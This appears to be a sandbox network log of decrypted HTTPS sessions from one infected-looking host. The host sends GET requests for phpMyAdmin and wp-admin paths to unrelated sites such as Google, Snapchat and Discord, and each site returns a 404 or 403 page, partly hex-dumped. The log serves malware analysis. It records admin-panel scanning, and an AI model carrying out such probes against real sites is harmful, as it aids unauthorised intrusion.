Session ID | Source IP | Source Port | Destination IP | Destination Port
216 | 192.168.2.6 | 49206 | 45.60.0.44 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 414 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: incap_ses_1816_2786379=7R8kW7naZWqCfxA+arozGXvDwGUAAAAAo66y6WgRP5rMrf2DD5XNTw==; visid_incap_2786379=nJ2nIEwwQtOC8ksVLl53JHrDwGUAAAAAQUIPAAAAAACXTPPl6ZJPhBOZf1gL0Zya; nlbi_2786379=Gm27FDXtdluMyfn/aJQkpgAAAAB2SWEC4z8u2KD9iiENxNub
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 352 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 8-5685667-5685669 NNNY CT(118 137 0) RT(1707131771639 312) q(0 0 0 -1) r(0 1) U24
2024-02-05 11:16:12 UTC | 1100 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
2024-02-05 11:16:12 UTC | 145 | IN | Data Ascii: re looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
217 | 192.168.2.6 | 65455 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 173 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:16:12 UTC | 1252 | IN | Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qnSnu5R-r6IfAqKOYgnUlQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:12 UTC | 397 | IN | Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:12 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
218 | 192.168.2.6 | 65482 | 104.22.74.220 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 174 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1186INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd68de1744fb-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
219 | 192.168.2.6 | 49384 | 34.149.46.130 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 175 | OUT | GET /pma/ HTTP/1.1
Host: accounts.snapchat.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 5706 | IN | HTTP/1.1 404 Not Found
content-type: text/html;charset=utf-8
vary: Accept-Encoding
set-cookie: sc-wcid=11e696ca-00e9-4715-9573-2d335896ff37; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:12 GMT; Max-Age=86400; Secure
expires: Thu, 01 Jan 1970 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubdomains
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-frame-options: allow-from https://iframe.arkoselabs.com
cache-control: no-cache, no-store, max-age=0
content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: dd8c78bfe1eac2eaa63b7df1def66f48
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: clear
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                220192.168.2.665395162.159.135.232443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC514OUTGET /wp-admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://discord.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC344INHTTP/1.1 404 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Ray: 850abd68ff8c450d-ATL
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 26 Jan 2024 19:46:37 GMT
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC2293INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 73 65 6c 66 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 6e 6f 6e 63 65 2d 4d 54 49 79 4c 44 63 35 4c 44 45 30 4f 53 77 78 4d 44 41 73 4d 6a 51 34 4c 44 45 31 4e 79 77 78 4e 54 51 73 4d 6a 55 3d 27 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 73 73 6c 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'nonce-MTIyLDc5LDE0OSwxMDAsMjQ4LDE1NywxNTQsMjU=' https://discord.com https://www.googletagmanager.com https://connect.facebook.net https://www.google-analytics.com https://ssl.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 37 66 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 75 62 51 38 33 6b 7a 32 59 59 52 72 6c 65 4a 61 59 66 5f 43 59 62 76 44 5a 36 6c 58 56 6c 2d 4e 4c 5f 4d 57 58 31 55 6a 39 59 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 76 61 6c 69 64 61 74 65 2e 30 31 22 20 63 6f 6e 74 65 6e 74 3d 22 33 33 30 44 43 39 30 34 38 34 41 34 42 37 42 36 31 42 33 36 41 44 36 35 45 38 39 42 34 37 41 45 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff2<!DOCTYPE html><html lang="en-US"><head> <meta charset="utf-8" /> <meta name="google-site-verification" content="nubQ83kz2YYRrleJaYf_CYbvDZ6lXVl-NL_MWX1Uj9Y" /> <meta name="msvalidate.01" content="330DC90484A4B7B61B36AD65E89B47AE" /> <meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 44 69 73 63 6f 72 64 3c 2f 74 69 74 6c 65 3e 20 20 3c 21 2d 2d 20 65 6e 64 73 65 63 74 69 6f 6e 20 2d 2d 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 44 69 73 63 6f 72 64 22 2f 3e 3c 6d 65 74 61 20 64 61 74 61 2d 72 65 61 63 74 2d 68 65 6c 6d 65 74 3d 22 74 72 75 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t-helmet="true">Page Not Found | Discord</title> ... endsection --><meta data-react-helmet="true" charset="utf-8"/><meta data-react-helmet="true" property="og:title" content="Page Not Found | Discord"/><meta data-react-helmet="true" property="og:image"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 39 4f 2d 35 34 5f 53 69 74 63 67 6d 78 51 4b 78 6c 41 26 67 74 6d 5f 70 72 65 76 69 65 77 3d 65 6e 76 2d 32 26 67 74 6d 5f 63 6f 6f 6b 69 65 73 5f 77 69 6e 3d 78 27 3b 20 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6a 2c 20 66 29 3b 0a 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 27 73 63 72 69 70 74 27 2c 20 27 64 61 74 61 4c 61 79 65 72 27 2c 20 27 47 54 4d 2d 4e 37 42 56 43 32 57 27 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 65 6e 64 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 21 2d 2d 20 73 65 63 74 69 6f 6e 3a 67 74 6d 4e 6f 53 63 72 69 70 74 2d 2d 3e 0a 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 69 66 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9O-54_SitcgmxQKxlA&gtm_preview=env-2&gtm_cookies_win=x'; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayer', 'GTM-N7BVC2W'); </script> ... endsection --></head><body> ... section:gtmNoScript--> <noscript> <ifr
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 43 31 31 35 2e 32 38 38 20 31 37 2e 33 35 32 37 20 31 31 35 2e 34 38 39 20 31 37 2e 38 36 34 32 20 31 31 35 2e 39 30 38 20 31 38 2e 32 36 37 32 43 31 31 36 2e 33 32 36 20 31 38 2e 36 37 30 32 20 31 31 36 2e 38 36 39 20 31 38 2e 38 37 31 37 20 31 31 37 2e 35 36 36 20 31 38 2e 38 37 31 37 43 31 31 38 2e 32 36 35 20 31 38 2e 38 37 31 37 20 31 31 38 2e 38 32 33 20 31 38 2e 36 37 30 32 20 31 31 39 2e 32 34 32 20 31 38 2e 32 35 31 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 35 38 2e 39 38 38 35 20 31 32 2e 34 30 39 31 43 36 30 2e 31 37 37 32 20 31 32 2e 34 30 39 31 20 36 31 2e 31 34 32 39 20 31 31 2e 35 34 31 36 20 36 31 2e 31 34 32 39 20 31 30 2e 34 37 31 37 43 36 31 2e 31 34 32 39 20 39 2e 34 30 31 36 34 20 36 30 2e 31 37 37 32 20 38 2e 35
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: C115.288 17.3527 115.489 17.8642 115.908 18.2672C116.326 18.6702 116.869 18.8717 117.566 18.8717C118.265 18.8717 118.823 18.6702 119.242 18.2517Z"></path><path d="M58.9885 12.4091C60.1772 12.4091 61.1429 11.5416 61.1429 10.4717C61.1429 9.40164 60.1772 8.5
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 37 33 33 20 36 2e 31 33 31 34 34 20 31 38 2e 38 35 36 33 20 36 2e 36 34 32 39 32 43 31 36 2e 34 39 38 39 20 36 2e 33 30 31 39 33 20 31 34 2e 31 35 38 35 20 36 2e 33 30 31 39 33 20 31 31 2e 38 33 33 36 20 36 2e 36 34 32 39 32 43 31 31 2e 36 31 36 36 20 36 2e 31 33 31 34 34 20 31 31 2e 32 39 31 31 20 35 2e 34 38 30 34 38 20 31 31 2e 30 32 37 36 20 35 43 38 2e 37 39 35 37 35 20 35 2e 33 37 31 39 38 20 36 2e 36 37 32 33 35 20 36 2e 30 33 38 34 35 20 34 2e 36 38 36 39 20 36 2e 39 35 32 39 43 30 2e 36 37 32 36 30 31 20 31 32 2e 38 37 33 36 20 2d 30 2e 34 31 32 33 35 20 31 38 2e 36 35 34 38 20 30 2e 31 33 30 31 32 34 20 32 34 2e 33 35 38 35 43 32 2e 37 39 35 39 39 20 32 36 2e 32 39 35 39 20 35 2e 33 36 38 38 39 20 32 37 2e 34 37 33 39 20 37 2e 38 39 36 38 32 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 733 6.13144 18.8563 6.64292C16.4989 6.30193 14.1585 6.30193 11.8336 6.64292C11.6166 6.13144 11.2911 5.48048 11.0276 5C8.79575 5.37198 6.67235 6.03845 4.6869 6.9529C0.672601 12.8736 -0.41235 18.6548 0.130124 24.3585C2.79599 26.2959 5.36889 27.4739 7.89682


Session ID | Source IP | Source Port | Destination IP | Destination Port
221 | 192.168.2.6 | 65422 | 3.134.125.175 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 190 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: 3fba-180-252-166-236.ngrok.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 249 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Ngrok-Error-Code: ERR_NGROK_3200
Ngrok-Trace-Id: a644e7390d5c8f058211db1c75284620
Referrer-Policy: no-referrer
Date: Mon, 05 Feb 2024 11:16:12 GMT
Transfer-Encoding: chunked
2024-02-05 11:16:12 UTC | 937 | IN | Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
2024-02-05 11:16:12 UTC | 1498 | IN | Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


Session ID | Source IP | Source Port | Destination IP | Destination Port
222 | 192.168.2.6 | 65520 | 77.240.114.212 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 173 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: mw.redsa.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 335 | IN | HTTP/1.1 404 No Encontrado
Date: Mon, 05 Feb 2024 11:17:28 GMT
Server: Apache-Coyote/1.1
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Content-Type: text/html;charset=utf-8
Content-Language: es
Content-Length: 1060
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Connection: close
